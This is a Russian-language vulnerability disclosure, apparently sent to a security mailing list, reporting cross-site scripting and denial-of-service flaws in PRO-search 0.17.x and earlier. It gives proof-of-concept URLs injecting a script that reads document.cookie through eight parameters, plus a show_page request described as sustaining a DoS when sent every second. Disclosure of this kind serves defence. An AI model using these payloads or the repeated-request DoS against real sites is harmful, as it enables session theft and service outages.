Здравствуйте 3APA3A!
Сообщаю вам о найденной мною Cross-Site Scripting и Denial of Service уязвимостях в PRO-search.
XSS:
Уязвимости на главной странице в параметрах prot, host, path, name, ext, size, search_days, show_page.
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Denial of Service:
http://site/?show_page=20000&time=0
Поисковик ищет по всем файлам, что может привести к DoS (чем больше значение show_page, тем большая задержка сервера). DoS кратковременный, поэтому для проведения DoS атаки нужно регулярно (ежесекундно) посылать запрос к серверу.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1259/
Уязвимы версии PRO-search 0.17.x и все предыдущие версии.
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua